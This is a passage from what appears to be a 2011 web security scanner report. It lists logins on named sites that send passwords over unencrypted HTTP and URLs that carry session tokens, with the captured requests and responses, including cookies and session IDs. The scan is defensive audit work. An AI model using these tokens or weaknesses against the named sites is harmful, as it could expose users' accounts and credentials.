       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

6.50. http://www.parker-software.com/forum/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parker-software.com
Path:	/forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.parker-software.com/forum/login_user.asp

The form contains the following password field:

password

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21920
Content-Type: text/html
Expires: Wed, 26 Jan 2011 13:58:10 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/
Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
Cache-control: No-Store

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" tabindex="1" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" tabindex="2" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

6.51. http://www.parkersoft.co.uk/client.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/client.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.parkersoft.co.uk/client.aspx

The form contains the following password field:

ctl00$ContentMain$txtPassword

Request

GET /client.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Referer: http://www.whoson.com/installable.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; path=/; HttpOnly
Set-Cookie: whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Date: Fri, 28 Jan 2011 13:57:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="client.aspx" id="aspnetForm">
<div>
...[SNIP]...
<br />
<input name="ctl00$ContentMain$txtPassword" type="password" maxlength="100" id="ctl00_ContentMain_txtPassword" style="width:200px;" />  
<input type="button" name="ctl00$ContentMain$btnLogin" value="Login" onclick="javascript:__doPostBack('ctl00$ContentMain$btnLogin','')" id="ctl00_ContentMain_btnLogin" />
...[SNIP]...

6.52. http://www.screenthumbs.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="882dc39daf895399d7dadcc1e174dbe0" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.53. http://www.screenthumbs.com/about previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/about

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET /about HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="ce27f33fe20b797949d1207d44f9639d" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.54. http://www.screenthumbs.com/contact previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/contact

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET /contact HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="50be459549d21d9341fab3fe0b1d0200" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.55. http://www.screenthumbs.com/forgot previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/forgot

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET /forgot HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="b00dd68db5285da7172bb1920113859c" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.56. http://www.screenthumbs.com/linkthumbs previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/linkthumbs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET /linkthumbs HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="65a86646a8217df0f2ef44a7bb955261" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.57. http://www.screenthumbs.com/plugins previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/plugins

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET /plugins HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

6.58. http://www.screenthumbs.com/service previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/service

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/login

The form contains the following password field:

password

Request

GET /service HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="ff365bee989fba6cf76abee1404951ea" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.59. http://www.screenthumbs.com/signup previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/signup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/signup.php

The form contains the following password fields:

password
password2

Request

GET /signup HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="signup" id="signup" action="/signup.php" method="post"><input type="hidden" name="signup_token" id="signup_token" value="53807e321727ceff4a6d8722a59e99fe" />
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password" id="password" /></td>
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password2" id="password2" /></td>
...[SNIP]...

6.60. http://www.screenthumbs.com/signup.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/signup.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.screenthumbs.com/signup.php

The form contains the following password fields:

password
password2

Request

GET /signup.php HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="signup" id="signup" action="/signup.php" method="post"><input type="hidden" name="signup_token" id="signup_token" value="f34de5585b9231b896e79b7faac5fb1a" />
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password" id="password" /></td>
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password2" id="password2" /></td>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://circle.stylemepretty.com/wp-login.php

The form contains the following password field:

Request

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<div id="sign-in">
<form method="post" action="http://circle.stylemepretty.com/wp-login.php">
<input type="submit" value="Log In" id="log-in" name="wp-submit" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
<input type="password" name="pwd" id="sign-in-password" />
<input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

7. Session token in URL previous next
There are 9 instances of this issue:

http://base.liveperson.net/hc/5296924/
https://base.liveperson.net/hc/5296924/
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://raw.oggifinogi.com/Track.aspx
http://www.bostonherald.com/entertainment/movies/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. http://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:06:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

7.2. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The URL in the request appears to contain a session token within the query string:

https://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:06:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: HumanClickCHATKEY=3761611791040242971; path=/hc/5296924; secure
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:48 GMT
Server: Apache/2.0.52 (Red Hat)
